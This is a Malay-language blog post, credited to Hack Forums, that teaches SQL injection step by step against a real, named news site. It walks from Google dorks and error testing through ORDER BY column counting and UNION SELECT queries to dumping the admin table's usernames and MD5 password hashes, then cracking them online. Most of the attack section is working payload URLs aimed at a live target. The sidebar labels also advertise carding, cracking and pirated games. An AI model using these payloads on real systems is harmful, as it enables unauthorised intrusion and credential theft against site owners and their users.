Saturday, 24 December 2011

Assalamualaikum Kepada Yang Islam Dan Selamat Sejahtera Kepada Yang Bukan Islam
Hari Ini Afnum Nk Ajar Korg Apa yg afnum jumpa dkt http://www.hackforums.net/index.php
hihi

baiklah mari kita mulakan

1.Gunakan Dork Ini Di Google ye

Disebabkan terlalu Bnyk List Nye
jadi afnum terpaksa la letak dekat Pastebin ye :D
ni link nye:http://pastebin.com/5qG5zwUy


Sekarang Kita Nk Check Url yg korg pilih ni Vuln atau tidak?
kita hanya perlu letakkan ' di belakang url
Skrg Kita Da Dpt target kita

Example:http://www.cocobod.gh/news_details.php?id=30

Skrg ni baru la kita bole tengok yg ianya vuln ataw tidak mcm yg saya type dekat atas tadi
hanya Letakkan ' di belakang url

Example:http://www.cocobod.gh/news_details.php?id=30'


Kalau Kita DApat Eror mcm gambar dekat bwh ni.itu bermakna yg website ini VULNRABLE
Mari kita teruskan ke langkah yg seterusnya

How To Find Columns Count:

Lepas kita dah ada Vuln site Kite kene la Cari columns.Untuk Mencari columns
anda hanya perlu tambah "Order by X--" Di hujung URL...X adalah nombor 1 hingga Tidak terkira Oleh saya..hihihi

Sebagai contoh, kita mempunyai Website Yg vuln dan kita Cuba Untuk Kira Columns Tersebut,
kita tambah order by 1-- pada akhir URL,Dan Order By 2--, Dan seterusnya.Jangan lupa untuk Sentiasa meningkatkan bilangan sehingga anda mendapat Error dalam laman web anda
Mcm ni:
Jadi Di Website Yg Kita "Target" Tadi Kita Telah MEnggunakan Comand Seperti Berikut:

http://www.cocobod.gh/news_details.php?id=30 order by 1-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 2-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 3-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 4-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 5-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 6-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 7-- >> no error
http://www.cocobod.gh/news_details.php?id=30 order by 8-- >> Unknown column/error

Disebabkan Sampai Columns no 8 Kita DApat Error
ini Bermakna Columns nombor 8 tidak wujud di website tersebut jadi
Kita akan hanya guna columns 7 sahaja

How to Find The Accessible Columns:

Sekarang, kita dah Tahu bahawa kiraan Columns adalah 7, langkah seterusnya adalah untuk menyemak acsessable columns, untuk berbuat demikian, kita menggunakanini querie "UNION SELECT Number,of,columns--" seperti ini:
Example:http://www.cocobod.gh/news_details.php?id=-30 union select 1,2,3,4,5,6,7--


JGN LUPA LETAKKAN TANDA - di belakang no
mcm ni
http://www.cocobod.gh/news_details.php?id=-30 union select 1,2,3,4,5,6,7--
jgn lupa ye~

Dan Kita Akan Dapat Benda Mcm Ni
Ini bermakna bahawa kita boleh mendapatkan maklumat dari Columns 6,2 3!


How To Get MySQL DB Version:
Skarang ni kita kena taw MySQL DB Version untuk tahu jika kita boleh Exploit
Website ini atau tidak..Kalau Site Yg Menggunakan MySQL 4.X.X Anda Tidak Akan Dapat MengExploit nya Tetapi Version 5.x.x Ke Atas Adalah Exploitable

Cara untuk Mengetahui MySQL DB Version,Gantikan No Colum Yg Tersenarai Di Website Td itu Dengan version() Ataupun @@version Tak ada beza pn antara dua comand ni

Example:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,@@version,7-- or http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,version(),7--

Hasilnya Akan Muncul Seperti Ini:
Inin Bermaksud Yang Kita Boleh Ke Langkah Yang Sterusnya

How To Find Database Name:

Sekarang kita akan inject site ini untuk mencari Nama DB,Untuk melakukan ini.
gantikan version() Atau @@version kepada "group_concat(schema_name)",
dan tambah Dekat belakang URL tu "from information_schema.schemata--"

Example:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(schema_name),7 from information_schema.schemata--
Kita da dapat 2DB dekat site ni
jadi kita akan gunakan salah 1 DB ini
Jadi,untuk menggunakan DB yang Digunakan site ini,Kita kene gantikan "group_concat(schema_name)" Kepada "concat(database())"

Example:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,concat(database()),7 from information_schema.schemata--

Hasil:
Tahniah!
Kita da dpt DB yg Digunakan Site ini

How to Get The Table Names:

Sekarang Ni Kita Nk Kena DApatKan Table Names ,Untuk melakukan ini,
gantikan "concat(database())" kepada "group_concat(table_name)" dan gantikan
"from information_schema.schemata--" Kepada "from information_schema.tables where table_schema=database()--" dekat akhir URL
Example:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(table_name),7 from information_schema.tables where table_schema=database()--

Haslinya:
OMG.nampaknya kita da jumpa Table Names.dan Kita da jumpa Admin ^^

How To Get Column Names:

Untuk Mendapatkan Column Names kita akan menggunakan comand ini
Gantikan "group_concat(table_name)" kepada "group_concat(column_name)"

Dan juga Anda harus gantikan "from information_schema.tables where table_schema=database()--" Kepada from information_schema.columns where table_schema=database()--


Example:http://www.cocobod.gh/news_details.php?id=30 union select 1,2,3,4,5,group_concat(column_name),7 from information_schema.columns where table_schema=database()--
OMG2 skrg ni kita da dapat Column names yg menyimpan Username dan Password

How To Get Informations From Columns:

Sekarang Ni Kita Da Sampai ke Langkah yg Terakhir!
OMG Seronoknye :D

Sekarang ni kita akan dapatkan INfo Admin daripada Columns
Bagaimanakah Cara Untuk kita melakukannya?
senang je..hihihi
mari ikut saya lakukannya :D

Example:http://www.site.com/news_details.php?id=30 union select 1,2,3,4,5,group_concat(columusername,0x3a,columnpassword),7 from cocobod_gh.coc_admin--

0x3a membawa maksud ":"


"cocobod_gh"
adalah DB yg digunakan Site ini jadi jika site lain menggunakan DB yang bernama lain..
korg kena la tukar nama DB ni ye


"coc_admin--"
adalah nama table yg kita guna tadi
mcm dekat
HOW TO GET TABLE NAMES


kalau site lain menggunakan
contoh:new_admin
korg kene tukar coc_admin kepada new_admin


Hasilnya!:
Alahai Kita dapat pasword yg Di Telah di Crypted Oleh MD5
Jadi kita kene la pigi Encrypt MD5 ini
gunakan Site ini untuk Encrypt MD5
http://www.md5decrypter.co.uk/
Dan Terpapar La Password yg di Crypt Oleh MD5 ^^

Translated and Edited By:aFnuM
Any question about This tut Plz Ask Us At
Sharing Is Caring

Credit To:Hackforums
Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Updates Via E-Mail

subcribe rss feedRSS

Labels

007 Legends (1) 007 Legends repack (1) 007 Legends-Black Box (1) 007 Legends-Black Box repack (1) 2K Games (1) 2K Marin (1) Action (8) Action RPG (5) Activision Blizzard (3) Alan Wake American Nightmare (1) Alan Wake American Nightmare-Black Box (1) ANARCHY (5) Antara AES dan pemandu kereta perasan bijak (1) antivirus (6) ARTIKEL (90) Bethesda Softworks (2) Binary Domain (2) BioShock 2 (1) BioWare Corporation (1) bitComposer Games (1) Bugbear Entertainment (1) Call of Duty: Modern Warfare 3 (1) Call of Duty: Modern Warfare 3-Black Box (1) CARDING (3) CD Projekt Red Studio (1) CERITA (7) CRACKER (18) Crysis 2 (1) Crytek Studios (1) Dark Souls: Prepare to Die Edition (1) Dark Souls: Prepare to Die Edition-Black Box (1) Darksiders (1) Darksiders II (1) Deface (1) Devil's Details (2) Digital Extremes (1) Doom 3:BFG Edition (1) Doom 3:BFG Edition-Black Box (1) EA Sports (1) Electronic Arts Inc. (4) ENGLISH MOVIE (29) Eurocom Entertainment Software (1) event (1) Exploit (76) FABLE III (1) Facebook Game Hack (1) FIFA 13 (1) FIFA 13-Black Box (1) Flashing (1) Flying Wild Hog (1) From Dust (1) From Dust-Black Box (1) From Software (1) gba games (1) Global Ops: Commando Libya (1) Global Ops: Commando Libya-Black Box (1) GORE (1) Hard Reset (1) Hard Reset-Black Box (1) HIJACK (2) History (3) id Software (1) iklan. (4) Infinity Ward (1) INFO (35) iPhone Jailbreak (9) ISU SEMASA (33) JOB (1) JOOMLA (1) KILLUMINATI (7) Konami (1) Lain-Lain Trick (1) LionHead Studios (1) MAKE MONEY (1) MALAY MOVIE (15) Mass Effect 2 (1) Max Payne 3 (1) Max Payne 3-Black Box (1) Maxis (1) Microsoft Game Studios (1) misteri (4) MOBILE (1) MUJAHID (27) music album mp3 (20) n-gage (1) Namco Bandai Games (3) NDS (1) Notepad Trick (1) OS (5) OTHER MOVIE LANGUES (8) PC GAME (141) photo (5) political (2) Pro Evolution Soccer 2013 (1) Pro Evolution Soccer 2013-Black Box (1) Prototype 2 (1) Prototype 2-Black Box (1) PS VITA (4) PS3 GAME (32) PSN GAME (6) PSP (7) PSPGAMES (4) puisi (1) putlocker games (5) Racing (1) Radical Entertainment (1) religion (12) Remedy Entertainment (1) repack game (1) REVEAL (32) Ridge Racer Unbounded-Black Box (1) Rockstar Games (1) S60v2 (1) Samsung U1000 (1) SEGA (2) SEO (2) Shooter (2) Shooting (2) Soalan bocor SPM 2012 ada di sini (1) Soft Skills Guide (1) software (31) Spectral Games (1) Sport (2) Strategy (1) SYSTEME (3) The Darkness II (1) The Darkness II-Black Box (1) The Elder Scrolls V: Skyrim (1) The Elder Scrolls V: Skyrim-Black Box (1) The Sims 3 (1) The Sims 3 Complete (1) The Sims 3 Complete-Black Box (1) The Witcher 2: Assassins of Kings (1) THQ Inc (2) tips (1) TOKOH (1) tool (2) Tutorial (30) TWEAK (6) Ubisoft Studios (1) UNDERGROUND (4) video movie (1) video music (1) Vigil Games (2) Website Hack (1) wii (2) XBOX360 (7) xboxone (1)

Total Pageviews

Blog Archive

LIST